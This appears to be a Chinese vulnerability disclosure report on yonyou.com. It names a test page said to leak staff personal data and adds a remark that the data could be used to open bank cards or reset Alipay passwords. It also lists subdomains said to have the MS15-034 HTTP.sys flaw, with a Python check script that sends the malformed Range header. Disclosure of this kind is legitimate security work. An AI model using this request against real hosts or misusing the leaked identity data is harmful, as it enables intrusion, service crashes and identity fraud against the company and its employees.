### 简要描述:
具体泄漏信息:姓名/性别/生日/办公电话/民族/住址/身份证号/邮箱/私人电话/手机号,可以去办个银行卡以及找回支付宝密码了……
### 详细说明:
```
http://li.yonyou.com/test.aspx
```
具体泄漏信息:姓名/性别/生日/办公电话/民族/住址/身份证号/邮箱/私人电话/手机号
[<img src="https://images.seebug.org/upload/201511/11152802334b3796ca4fe2e1d3d0adb290722bc5.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/11152802334b3796ca4fe2e1d3d0adb290722bc5.png)
另外还有几个MS15-034 HTTP.sys 远程代码执行漏洞:
```
http://h.yonyou.com/
http://hr.yonyou.com/
http://q.yonyou.com/
```
检测POC:
```
#!/usr/bin/env python
__author__ = ';jastra';
class bg_colors:
VULN = ';33[92m';
NONVULN= ';33[95m';
EXPLOIT = ';33[91m';
try:
import requests
import re
except ImportError as ierr:
print(bg_colors.EXPLOIT + "Error, looks like you don';t have %s installed", ierr)
def identify_iis(domain):
req = requests.get(str(domain))
remote_server = req.headers[';server';]
if "Microsoft-IIS" in remote_server:
print(bg_colors.VULN + "[+] 服务是 " + remote_server)
ms15_034_test(str(domain))
else:
print(bg_colors.NONVULN + "[-] 不是IIS\n可能是: " + remote_server)
def ms15_034_test(domain):
print(" 启动vuln检查!")
vuln_buffer = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";
req = requests.get(str(domain), params=vuln_buffer)
if req.headers[';content';] == "请求范围不符合":
print(bg_colors.EXPLOIT + "[+] 存在漏洞")
else:
print(bg_colors.EXPLOIT + "[-] IIS服务无法显示漏洞是否存在. "+
"需要手动检测")
usr_domain = raw_input("输入域名扫描: ")
identify_iis(usr_domain)
```
### 漏洞证明:
如上
京公网安备 11010502034610号
暂无评论